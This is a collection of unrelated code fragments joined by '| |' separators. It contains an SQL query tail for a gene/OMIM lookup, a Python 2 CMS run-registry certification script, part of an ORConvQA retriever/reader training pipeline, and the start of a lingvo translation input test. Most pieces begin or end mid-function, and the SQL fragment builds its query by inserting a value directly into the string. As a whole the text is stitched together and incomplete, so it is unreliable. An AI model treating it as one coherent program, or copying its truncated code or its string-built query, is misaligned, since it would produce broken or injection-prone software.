"where eDiVa_scratch.Table_gene2mim.mim_number = eDiVa_scratch.Table_omim.mim_number "+
"and eDiVa_scratch.Table_gene2mim.gene_name ='%s';"%gene_name)
#sql = "select chr,pos,lengthofrepeat,copyNum,region from ediva_public_omics.Table_simpleRepeat;"
cur.execute(sql)
count = 0
omim_disease =""
omim_2 = ""
for row in cur:
count | |
#! /usr/bin/env python
################################################################################
#
#
# $Author: smaruyam $
# $Date: 2012/12/14 17:02:45 $
# $Revision: 1.15 $ 18.06.2015 $
#
#
# <NAME> = <EMAIL>
# <NAME> = <EMAIL>
# <NAME> = <EMAIL>
#
################################################################################
import re, json, sys, ConfigParser, os, string, commands, time, socket
from rrapi import RRApi, RRApiError
class Certifier():
cfg='runreg.cfg'
OnlineRX = "%Online%ALL"
EXCL_LS_BITS = ('jetmet','muon','egamma')
EXCL_RUN_BITS = ('all')
def __init__(self,argv,verbose=False):
self.verbose = verbose
if len(argv)==2:
self.cfg = argv[1]
else:
self.cfg = Certifier.cfg
self.qry = {}
self.qry.setdefault("GOOD", "isNull OR = true")
self.qry.setdefault("BAD", " = false")
self.readConfig()
def readConfig(self):
CONFIG = ConfigParser.ConfigParser()
if self.verbose:
print 'Reading configuration file from %s' % self.cfg
CONFIG.read(self.cfg)
cfglist = CONFIG.items('Common')
self.dataset = CONFIG.get('Common','DATASET')
self.group = CONFIG.get('Common','GROUP')
self.address = CONFIG.get('Common','RUNREG')
self.runmin = CONFIG.get('Common','RUNMIN')
self.runmax = CONFIG.get('Common','RUNMAX')
self.runlist = ""
for item in cfglist:
if "RUNLIST" in item[0].upper():
self.runlist = item[1].split(" ")
self.qflist = CONFIG.get('Common','QFLAGS').split(',')
self.bfield_thr = '-0.1'
self.bfield_min = '-0.1'
self.bfield_max = '4.1'
self.injection = "%"
self.dcslist = CONFIG.get('Common','DCS').split(',')
self.jsonfile = CONFIG.get('Common','JSONFILE')
self.beamene = []
self.dbs_pds_all = ""
self.online_cfg = "FALSE"
self.usedbs = False
self.useDAS = False
self.dsstate = ""
self.useDBScache = "False"
self.useBeamPresent = "False"
self.useBeamStable = "False"
self.cacheFiles = []
self.predefinedPD = ["/Commissioning/Run2015A-v1/RAW","/ZeroBias/Run2015B-v1/RAW"]
self.component = []
self.nolowpu = "True"
print "First run ", self.runmin
print "Last run ", self.runmax
if len(self.runlist)>0:
print "List of runs ", self.runlist, " (",len(self.runlist), " runs)"
print "Dataset name ", self.dataset
print "Group name ", self.group
print "Quality flags ", self.qflist
print "DCS flags ", self.dcslist
for item in cfglist:
if "INJECTION" in item[0].upper():
self.injection = item[1]
if "BFIELD_THR" in item[0].upper():
self.bfield_thr = item[1]
if "BFIELD_MIN" in item[0].upper():
self.bfield_min = item[1]
if "BFIELD_MAX" in item[0].upper():
self.bfield_max = item[1]
if "BEAM_ENE" in item[0].upper():
self.beamene = item[1].split(',')
if "DBS_PDS" in item[0].upper():
self.dbs_pds_all = item[1]
self.usedbs = True
if "USE_DAS" in item[0].upper():
self.useDAS = item[1]
if "ONLINE" in item[0].upper():
self.online_cfg = item[1]
if "DSSTATE" in item[0].upper():
self.dsstate = item[1]
if "DBSCACHE" in item[0].upper():
self.useDBScache = item[1]
if "BEAMPRESENT" in item[0].upper():
self.useBeamPresent = item[1]
print 'Use Beam Present Flag', self.useBeamPresent
if "BEAMSTABLE" in item[0].upper():
self.useBeamStable = item[1]
print 'Use Beam Stable Flag', self.useBeamStable
if "CACHEFILE" in item[0].upper():
self.cacheFiles = item[1].split(',')
if "COMPONENT" in item[0].upper():
self.component = item[1].split(',')
print 'COMPONENT ', self.component
if "NOLOWPU" in item[0].upper():
self.nolowpu = item[1]
print 'NoLowPU', self.nolowpu
self.dbs_pds = self.dbs_pds_all.split(",")
print "Injection schema ", self.injection
if self.useDAS == "True":
self.usedbs = False
print "Using DAS database: ", self.useDAS
print "Using Cache? : ", self.useDBScache
self.online = False
if "TRUE" == self.online_cfg.upper() or \
"1" == self.online_cfg.upper() or \
"YES" == self.online_cfg.upper():
self.online = True
try:
self.bfield_min = float(self.bfield_min)
except:
print "Minimum BFIELD value not understood: ", self.bfield_min
sys.exit(1)
try:
self.bfield_max = float(self.bfield_max)
except:
print "Maximum BFIELD value not understood: ", self.bfield_max
sys.exit(1)
try:
self.bfield_thr = float(self.bfield_thr)
except:
print "Threshold BFIELD value not understood: ", self.bfield_thr
sys.exit(1)
if self.bfield_thr > self.bfield_min:
self.bfield_min = self.bfield_thr
for e in range(0, len(self.beamene)):
try:
self.beamene[e] = float(self.beamene[e])
if self.verbose:
print "Beam Energy ", self.beamene
except:
print "BEAMENE value not understood: ", self.beamene
sys.exit(1)
def generateFilter(self):
self.filter = {}
self.filter.setdefault("dataset", {})\
.setdefault("rowClass", "org.cern.cms.dqm.runregistry.user.model.RunDatasetRowGlobal")
for qf in self.qflist:
(sys,value) = qf.split(':')
if self.verbose: print qf
if sys != "NONE":
                # Check if the bit is not excluded, to avoid filtering on LS for Egamma, Muon, JetMET
if len([i for i in self.EXCL_LS_BITS if i == sys.lower()]) == 0:
self.filter.setdefault(sys.lower()+"Status", self.qry[value])
# Check run flag
if (self.EXCL_RUN_BITS != sys.lower()):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault(sys.lower(), {})\
.setdefault("status", " = %s" % value)
if self.nolowpu == "True":
print "Removing low pile-up runs"
self.filter.setdefault("lowLumiStatus", "isNull OR = false")
else:
print "Selecting ONLY low pile-up runs"
self.filter.setdefault("lowLumiStatus", "true")
for dcs in self.dcslist:
if dcs != "NONE":
self.filter.setdefault(dcs.lower()+"Ready", "isNull OR = true")
# self.filter.setdefault(dcs.lower(), "isNull OR = true")
if self.verbose: print dcs
if self.useBeamPresent == "True":
print "Removing LS with no beam present"
self.filter.setdefault("beam1Present", "isNull OR = true")
self.filter.setdefault("beam2Present", "isNull OR = true")
if self.useBeamStable == "True":
print "Removing LS with non-stable beams"
self.filter.setdefault("beam1Stable", "isNull OR = true")
self.filter.setdefault("beam2Stable", "isNull OR = true")
if self.online:
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetName", "like %s" % Certifier.OnlineRX)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("online", " = true")
else:
datasetQuery = ''
for i in self.dataset.split():
datasetQuery += ' like "%s" OR' % i.split(":")[0]
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetName", " like %s" % datasetQuery)
self.filter.setdefault("runNumber", ">= %d AND <= %d " %(int(self.runmin), int(self.runmax)))
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("runClassName", self.group)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("rowClass", "org.cern.cms.dqm.runregistry.user.model.RunSummaryRowGlobal")
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter",{})\
.setdefault("bfield", "> %.1f AND < %.1f " % (self.bfield_min, self.bfield_max) )
if self.group.startswith("Collisions"):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter", {})\
.setdefault("injectionScheme", " like %s " % self.injection )
self.filter.setdefault("cmsActive", "isNull OR = true")
for comp in self.component:
if comp != 'NONE':
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("filter",{})\
.setdefault(comp.lower()+"Present", " = true")
if len(self.dsstate):
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("datasetState", " = %s" % self.dsstate)
if len(self.beamene):
eneQuery = '{lhcEnergy} IS NULL OR {lhcEnergy} = 0 '
for e in self.beamene:
energyLow = e - 400
if energyLow < 0:
energyLow = 0
energyHigh = e + 400
eneQuery += 'OR ( {lhcEnergy} >= %.1d AND {lhcEnergy} <= %.1d) ' % (energyLow, energyHigh)
self.filter.setdefault("dataset", {})\
.setdefault("filter", {})\
.setdefault("run", {})\
.setdefault("query", eneQuery)
if self.verbose:
print json.dumps(self.filter)
def generateJson(self):
try:
self.api = RRApi(self.address, debug = self.verbose)
except RRApiError, e:
print e
sys.exit(1)
self.cert_json = self.api.data(workspace = 'GLOBAL'\
, table = 'datasetlumis'\
, template = 'json'\
, columns = ['runNumber', 'sectionFrom', 'sectionTo']\
, tag = 'LATEST'\
, filter = self.filter)
if self.verbose:
print "Printing JSON file ", json.dumps(self.cert_json)
self.convertToOldJson()
dbsjson={}
if self.useDBScache == "True":
dbsjson=get_cachejson(self, self.dbs_pds_all)
elif self.usedbs:
dbsjson=get_dbsjson(self, self.dbs_pds_all, self.runmin, self.runmax, self.runlist)
elif self.useDAS:
dbsjson=get_dasjson(self, self.dbs_pds_all, self.runmin, self.runmax, self.runlist)
else:
# special case, e.g. cosmics which do not need DB or cache file
print "\nINFO: no cache or DB option was selected in cfg file"
if self.useDBScache == "True" or \
self.usedbs or \
self.useDAS:
if len(dbsjson)==0:
print "\nERROR, dbsjson contains no runs, please check!"
sys.exit(1)
if self.verbose:
print "Printing dbsjson ", dbsjson
for element in self.cert_old_json:
combined=[]
dbsbad_int=invert_intervals(self.cert_old_json[element])
if self.verbose:
print " debug: Good Lumi ", self.cert_old_json[element]
print " debug: Bad Lumi ", dbsbad_int
for interval in dbsbad_int:
combined.append(interval)
if element in dbsjson.keys():
if self.verbose:
print " debug: Found in DBS, Run ", element, ", Lumi ", dbsjson[element]
dbsbad_int=invert_intervals(dbsjson[element])
if self.verbose:
print " debug DBS: Bad Lumi ", dbsbad_int
else:
dbsbad_int=[[1,9999]]
for interval in dbsbad_int:
combined.append(interval)
combined=merge_intervals(combined)
combined=invert_intervals(combined)
if len(combined)!=0:
self.cert_old_json[element]=combined
if self.verbose:
print json.dumps(self.cert_old_json)
def convertToOldJson(self):
old_json = {}
self.cert_old_json = {}
for block in self.cert_json:
if len(block) == 3:
runNum = block['runNumber']
lumiStart = block['sectionFrom']
lumiEnd = block['sectionTo']
if self.verbose:
print " debug: Run ", runNum, " Lumi ", lumiStart, ", ", lumiEnd
                # Impose the selection of runs from the run list, if given in the cfg file
                # (applied here to the list of runs accessed from RR; the same is applied
                # later to the list accessed from DAS).
if len(self.runlist)>0:
foundr = False
for runinl in self.runlist:
if runinl.startswith('"'):
runinl = runinl[1:]
if runinl.endswith('"'):
runinl = runinl[:-1]
if int(runNum) == int(runinl):
foundr = True
# print "selecting run fom the list = ", runNum, runinl
if foundr:
old_json.setdefault(str(runNum), []).append([lumiStart, lumiEnd])
if self.verbose:
print old_json[str(runNum)]
else:
old_json.setdefault(str(runNum), []).append([lumiStart, lumiEnd])
if self.verbose:
print old_json[str(runNum)]
for block in old_json:
temp = []
temp = merge_intervals2(old_json[block])
self.cert_old_json.setdefault(block, temp)
if self.verbose:
print "Merging Done on Run ", block,
print " Interval ", temp
def writeJson(self):
js = open(self.jsonfile, 'w+')
json.dump(self.cert_old_json, js, sort_keys=True)
js.close()
# print json file name
print " "
print "-------------------------------------------"
print "Json file: %s written.\n" % self.jsonfile
def invert_intervals(intervals,min_val=1,max_val=9999):
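    # Worked example (assuming the closing branch appends the final
    # (curr_min, max_val) interval): invert_intervals([[3, 5], [8, 9]], 1, 12)
    # -> [(1, 2), (6, 7), (10, 12)].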
if not intervals:
return []
intervals=merge_intervals(intervals)
intervals = sorted(intervals, key = lambda x: x[0])
result = []
if min_val==-1:
(a,b)=intervals[0]
min_val=a
if max_val==-1:
(a,b)=intervals[len(intervals)-1]
max_val=b
curr_min=min_val
for (x,y) in intervals:
if x>curr_min:
result.append((curr_min,x-1))
curr_min=y+1
if curr_min<max_val:
| |
start_logits=to_list(outputs[0][i]),
end_logits=to_list(outputs[1][i]),
retrieval_logits=to_list(outputs[2][i]),
retriever_prob=retriever_probs[i])
all_results.append(result)
evalTime = timeit.default_timer() - start_time
logger.info(" Evaluation done in total %f secs (%f sec per example)",
evalTime, evalTime / len(dataset))
output_prediction_file = os.path.join(
predict_dir, "instance_predictions_{}.json".format(prefix))
output_nbest_file = os.path.join(
predict_dir, "instance_nbest_predictions_{}.json".format(prefix))
output_final_prediction_file = os.path.join(
predict_dir, "final_predictions_{}.json".format(prefix))
if args.version_2_with_negative:
output_null_log_odds_file = os.path.join(
predict_dir, "instance_null_odds_{}.json".format(prefix))
else:
output_null_log_odds_file = None
all_predictions = write_predictions(examples, features, all_results, args.n_best_size,
args.max_answer_length, args.do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file, args.verbose_logging,
args.version_2_with_negative, args.null_score_diff_threshold)
write_final_predictions(all_predictions, output_final_prediction_file,
use_rerank_prob=args.use_rerank_prob,
use_retriever_prob=args.use_retriever_prob)
eval_metrics = quac_eval(
orig_eval_file, output_final_prediction_file)
rerank_metrics = get_retrieval_metrics(
pytrec_eval_evaluator, all_predictions, eval_retriever_probs=True)
eval_metrics.update(rerank_metrics)
metrics_file = os.path.join(
predict_dir, "metrics_{}.json".format(prefix))
with open(metrics_file, 'w') as fout:
json.dump(eval_metrics, fout)
return eval_metrics
def gen_query_reps(args, model, batch):
model.eval()
batch = {k: v.to(args.device) for k, v in batch.items()
if k not in ['example_id', 'qid', 'question_text', 'answer_text', 'answer_start']}
with torch.no_grad():
inputs = {}
inputs['query_input_ids'] = batch['query_input_ids']
inputs['query_attention_mask'] = batch['query_attention_mask']
inputs['query_token_type_ids'] = batch['query_token_type_ids']
outputs = model.retriever(**inputs)
query_reps = outputs[0]
return query_reps
def retrieve(args, qids, qid_to_idx, query_reps,
passage_ids, passage_id_to_idx, passage_reps,
qrels, qrels_sparse_matrix,
gpu_index, include_positive_passage=False):
query_reps = query_reps.detach().cpu().numpy()
D, I = gpu_index.search(query_reps, args.top_k_for_retriever)
pidx_for_retriever = np.copy(I)
qidx = [qid_to_idx[qid] for qid in qids]
qidx_expanded = np.expand_dims(qidx, axis=1)
qidx_expanded = np.repeat(qidx_expanded, args.top_k_for_retriever, axis=1)
labels_for_retriever = qrels_sparse_matrix[qidx_expanded, pidx_for_retriever].toarray()
# print('labels_for_retriever before', labels_for_retriever)
if include_positive_passage:
for i, (qid, labels_per_query) in enumerate(zip(qids, labels_for_retriever)):
has_positive = np.sum(labels_per_query)
if not has_positive:
positive_pid = list(qrels[qid].keys())[0]
positive_pidx = passage_id_to_idx[positive_pid]
pidx_for_retriever[i][-1] = positive_pidx
labels_for_retriever = qrels_sparse_matrix[qidx_expanded, pidx_for_retriever].toarray()
# print('labels_for_retriever after', labels_for_retriever)
assert np.sum(labels_for_retriever) >= len(labels_for_retriever)
pids_for_retriever = passage_ids[pidx_for_retriever]
passage_reps_for_retriever = passage_reps[pidx_for_retriever]
scores = D[:, :args.top_k_for_reader]
retriever_probs = sp.special.softmax(scores, axis=1)
pidx_for_reader = I[:, :args.top_k_for_reader]
# print('pidx_for_reader', pidx_for_reader)
# print('qids', qids)
# print('qidx', qidx)
qidx_expanded = np.expand_dims(qidx, axis=1)
qidx_expanded = np.repeat(qidx_expanded, args.top_k_for_reader, axis=1)
# print('qidx_expanded', qidx_expanded)
labels_for_reader = qrels_sparse_matrix[qidx_expanded, pidx_for_reader].toarray()
    # print('labels_for_reader before', labels_for_reader)
if include_positive_passage:
for i, (qid, labels_per_query) in enumerate(zip(qids, labels_for_reader)):
has_positive = np.sum(labels_per_query)
if not has_positive:
positive_pid = list(qrels[qid].keys())[0]
positive_pidx = passage_id_to_idx[positive_pid]
pidx_for_reader[i][-1] = positive_pidx
labels_for_reader = qrels_sparse_matrix[qidx_expanded, pidx_for_reader].toarray()
# print('labels_for_reader after', labels_for_reader)
assert np.sum(labels_for_reader) >= len(labels_for_reader)
# print('labels_for_reader after', labels_for_reader)
pids_for_reader = passage_ids[pidx_for_reader]
# print('pids_for_reader', pids_for_reader)
passages_for_reader = get_passages(pidx_for_reader, args)
# we do not need to modify scores and probs matrices because they will only be
# needed at evaluation, where include_positive_passage will be false
return {'qidx': qidx,
'pidx_for_retriever': pidx_for_retriever,
'pids_for_retriever': pids_for_retriever,
'passage_reps_for_retriever': passage_reps_for_retriever,
'labels_for_retriever': labels_for_retriever,
'retriever_probs': retriever_probs,
'pidx_for_reader': pidx_for_reader,
'pids_for_reader': pids_for_reader,
'passages_for_reader': passages_for_reader,
'labels_for_reader': labels_for_reader}
def get_passage(i, args):
line = linecache.getline(args.blocks_path, i + 1)
line = json.loads(line.strip())
return line['text']
get_passages = np.vectorize(get_passage)
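# np.vectorize lets get_passage be applied elementwise, so get_passages() can take
# the whole (batch, top_k) array of passage indices returned by the faiss search.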
def load_pickle(fname, logger):
logger.info(f'loading pickle file: {fname}')
if not os.path.isfile(fname):
logger.error(f'Failed to open {fname}, file not found')
# Fix reading large pickle files on MAC systems
if platform.system() == "Darwin":
bytes_in = bytearray(0)
max_bytes = 2 ** 31 - 1
        input_size = os.path.getsize(fname)
        with open(fname, 'rb') as f_in:
for _ in range(0, input_size, max_bytes):
bytes_in += f_in.read(max_bytes)
return pkl.loads(bytes_in)
with open(fname, 'rb') as handle:
return joblib.load(handle)
def load_json(fname, logger):
logger.info(f'loading json file {fname}')
if not os.path.isfile(fname):
logger.error(f'Failed to open {fname}, file not found')
    with open(fname) as handle:
return json.load(handle)
#TODO combine with resource manager
def construct_faiss_index(passage_reps, proj_size, no_cuda, logger):
logger.info('constructing passage faiss_index')
index = faiss.IndexFlatIP(proj_size)
index.add(passage_reps)
if torch.cuda.is_available() and not no_cuda:
faiss_res = faiss.StandardGpuResources()
if torch.cuda.device_count() > 1:
# run faiss on last gpu if more than 1 is available
gpuId = torch.cuda.device_count() - 1
index = faiss.index_cpu_to_gpu(faiss_res, gpuId, index)
else:
# otherwise use the only available one
index = faiss.index_cpu_to_gpu(faiss_res, 0, index)
return index
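# Illustrative call (mirrors the invocation further below; faiss expects the
# passage representations as a float32 numpy array):
#   gpu_index = construct_faiss_index(passage_reps, args.proj_size, args.no_cuda, logger)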
def create_inv_passage_id_index(passage_ids):
# TODO this seems like a slow way to do this
passage_id_to_idx = {}
for i, pid in enumerate(passage_ids):
passage_id_to_idx[pid] = i
return passage_id_to_idx
# TODO rename, also returns inverse quid index
def create_qrel_sparse_matrix(qrels, passage_id_to_idx):
# TODO no loops?
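    # Expected input shape (illustrative): qrels = {"qid_1": {"pid_7": 1}, ...}.
    # The returned CSR matrix has one row per question and one column per passage,
    # with a 1 wherever that passage is marked relevant for the question.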
qrels_data, qrels_row_idx, qrels_col_idx = [], [], []
qid_to_idx = {}
for i, (qid, v) in enumerate(qrels.items()):
qid_to_idx[qid] = i
for pid in v.keys():
qrels_data.append(1)
qrels_row_idx.append(i)
qrels_col_idx.append(passage_id_to_idx[pid])
qrels_sparse_matrix = sp.sparse.csr_matrix(
(qrels_data, (qrels_row_idx, qrels_col_idx)))
return qrels_sparse_matrix, qid_to_idx
#####################
# CODE START
####################
logger = logging.getLogger(__name__)
ALL_MODELS = list(BertConfig.pretrained_config_archive_map.keys())
MODEL_CLASSES = {
'reader': (BertConfig, BertForOrconvqaGlobal, BertTokenizer),
'retriever': (AlbertConfig, AlbertForRetrieverOnlyPositivePassage, AlbertTokenizer),
}
argparser = StdArgparser()
args = argparser.get_parsed()
# TODO fix everything going through single output dir (better off with multiple subfiles per run unless continue flag is set)
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train and not args.overwrite_output_dir:
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(args.output_dir))
# TODO DONT OVERWRITE ARGUMENTS
args.retriever_tokenizer_dir = os.path.join(args.output_dir, 'retriever')
args.reader_tokenizer_dir = os.path.join(args.output_dir, 'reader')
# Setup distant debugging if needed
# TODO remove? Seems outside of the scope of this project
# if args.server_ip and args.server_port:
# # Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
# import ptvsd
# print("Waiting for debugger attach")
# ptvsd.enable_attach(
# address=(args.server_ip, args.server_port), redirect_output=True)
# ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
# we now only support joint training on a single card
# we will request two cards, one for torch and the other one for faiss
# TODO create general resource manager class to assign GPU space, this code seems pretty bad (P.S. look at fais index creation)
if args.local_rank == -1 or args.no_cuda:
device = torch.device(
"cuda:0" if torch.cuda.is_available() and not args.no_cuda else "cpu")
# args.n_gpu = torch.cuda.device_count()
args.n_gpu = 1
# torch.cuda.set_device(0)
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend='nccl')
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN)
logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank, device, args.n_gpu, bool(args.local_rank != -1), args.fp16)
# Set seed
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
model = Pipeline()
args.retriever_model_type = args.retriever_model_type.lower()
retriever_config_class, retriever_model_class, retriever_tokenizer_class = MODEL_CLASSES['retriever']
retriever_config = retriever_config_class.from_pretrained(args.retrieve_checkpoint)
# load pretrained retriever
retriever_tokenizer = retriever_tokenizer_class.from_pretrained(args.retrieve_tokenizer_dir)
retriever_model = retriever_model_class.from_pretrained(args.retrieve_checkpoint, force_download=True)
model.retriever = retriever_model
# do not need and do not tune passage encoder
model.retriever.passage_encoder = None
model.retriever.passage_proj = None
args.reader_model_type = args.reader_model_type.lower()
reader_config_class, reader_model_class, reader_tokenizer_class = MODEL_CLASSES['reader']
reader_config = reader_config_class.from_pretrained(args.reader_config_name if args.reader_config_name else args.reader_model_name_or_path,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
reader_config.num_qa_labels = 2
# this is not used for BertForOrconvqaGlobal
reader_config.num_retrieval_labels = 2
reader_config.qa_loss_factor = args.qa_loss_factor
reader_config.retrieval_loss_factor = args.retrieval_loss_factor
reader_tokenizer = reader_tokenizer_class.from_pretrained(args.reader_tokenizer_name if args.reader_tokenizer_name else args.reader_model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
reader_model = reader_model_class.from_pretrained(args.reader_model_name_or_path,
from_tf=bool(
'.ckpt' in args.reader_model_name_or_path),
config=reader_config,
cache_dir=args.reader_cache_dir if args.reader_cache_dir else None)
model.reader = reader_model
if args.local_rank == 0:
# Make sure only the first process in distributed training will download model & vocab
torch.distributed.barrier()
# TODO What? assign again? Isn't GPU space already assigned?
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Before we do anything with models, we want to ensure that we get fp16 execution of torch.einsum if args.fp16 is set.
# Otherwise it'll default to "promote" mode, and we'll get fp32 operations. Note that running `--fp16_opt_level="O2"` will
# remove the need for this code, but it is still valid.
# TODO do we need this?
if args.fp16:
try:
import apex
apex.amp.register_half_function(torch, 'einsum')
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
passage_ids = load_pickle(args.passage_ids_path, logger)
passage_reps = load_pickle(args.passage_reps_path, logger)
#TODO change this var name, not allways a GPU index, can also be CPU based faiss index
gpu_index = construct_faiss_index(passage_reps, args.proj_size, args.no_cuda, logger)
qrels = load_json(args.qrels, logger)
passage_id_to_idx = create_inv_passage_id_index(passage_ids)
qrels_sparse_matrix, qid_to_idx = create_qrel_sparse_matrix(qrels, passage_id_to_idx)
evaluator = pytrec_eval.RelevanceEvaluator(qrels, {'recip_rank', 'recall'})
# Training
if args.do_train:
DatasetClass = RetrieverDataset
train_dataset = DatasetClass(args.train_file, retriever_tokenizer,
args.load_small, args.history_num,
query_max_seq_length=args.retriever_query_max_seq_length,
is_pretraining=args.is_pretraining,
given_query=True,
given_passage=False,
include_first_for_retriever=args.include_first_for_retriever)
global_step, tr_loss = train(
args, train_dataset, model, retriever_tokenizer, reader_tokenizer)
logger.info(" global_step = %s, average loss = %s",
global_step, tr_loss)
# Save the trained model and the tokenizer
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
# TODO should be easy to move to own function
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
if not os.path.exists(args.retriever_tokenizer_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.retriever_tokenizer_dir)
if not os.path.exists(args.reader_tokenizer_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.reader_tokenizer_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
# Take care of distributed/parallel training
model_to_save = model.module if hasattr(model, 'module') else model
final_checkpoint_output_dir = os.path.join(
args.output_dir, 'checkpoint-{}'.format(global_step))
# TODO fine, but maybe move to function?
final_retriever_model_dir = os.path.join(
final_checkpoint_output_dir, 'retriever')
final_reader_model_dir = os.path.join(
final_checkpoint_output_dir, 'reader')
# TODO | |
<gh_stars>0
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for input generator."""
from absl.testing import parameterized
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import py_utils
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.core import tokenizers
from lingvo.tasks.mt import input_generator
import mock
import numpy as np
class InputTest(test_utils.TestCase, parameterized.TestCase):
def _CreateMlPerfInputParams(self):
p = input_generator.MlPerfInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/translate_ende_wmt32k-train-00511-of-00512')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 40]
p.bucket_batch_limit = [4, 8]
return p
def _CreateMlPerfPackedInputParams(self):
p = input_generator.MlPerfInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/translate_ende_mlperf.packed.tfrecord')
p.file_pattern = 'tfrecord:' + input_file
p.packed_input = True
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 240]
p.bucket_batch_limit = [4, 4]
return p
def _CreateNmtInputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [20, 40]
p.bucket_batch_limit = [4, 8]
return p
def testBasic(self):
p = self._CreateNmtInputParams()
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
# Runs a few steps.
for _ in range(10):
self.evaluate(inp.GetPreprocessedInputBatch())
def testMlPerfPackedInput(self):
p = self._CreateMlPerfPackedInputParams()
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
for _ in range(1):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
tf.logging.info(fetched.src.ids.shape)
tf.logging.info(fetched.src.segment_ids.shape)
tf.logging.info(fetched.src.segment_pos.shape)
tf.logging.info(fetched.tgt.segment_ids.shape)
tf.logging.info(fetched.tgt.segment_pos.shape)
def checkPadShape(self, x, pad, batch_size, actual_max, pad_length):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (batch_size, pad_length))
# Check the padding.
self.assertAllEqual(x[:, actual_max:],
np.full((batch_size, (pad_length - actual_max)), pad))
def testMlPerfPackedInputPadToMax(self):
p = self._CreateMlPerfPackedInputParams()
p.source_max_length = 300
p.target_max_length = 300
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
for _ in range(1):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
self.checkPadShape(
fetched.src.ids, pad=0, batch_size=4, actual_max=240, pad_length=300)
self.checkPadShape(
fetched.tgt.ids, pad=0, batch_size=4, actual_max=240, pad_length=300)
self.checkPadShape(
fetched.tgt.segment_ids,
pad=0,
batch_size=4,
actual_max=240,
pad_length=300)
self.checkPadShape(
fetched.tgt.segment_pos,
pad=0,
batch_size=4,
actual_max=240,
pad_length=300)
def testMlPerf(self):
p = self._CreateMlPerfInputParams()
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
# Runs a few steps.
for _ in range(10):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
tf.logging.info(fetched)
def testMlPerfPadToMax(self):
p = self._CreateMlPerfInputParams()
p.bucket_upper_bound = [20]
p.bucket_batch_limit = [4]
p.source_max_length = 30
p.target_max_length = 30
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.MlPerfInput(p)
# Runs a few steps.
for _ in range(10):
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
def Check(x, pad):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (4, 30))
# Check the padding.
self.assertAllEqual(x[:, 20:], np.full((4, 10), pad))
Check(fetched.src.ids, 0)
Check(fetched.src.paddings, 1)
Check(fetched.tgt.ids, 0)
Check(fetched.tgt.labels, 0)
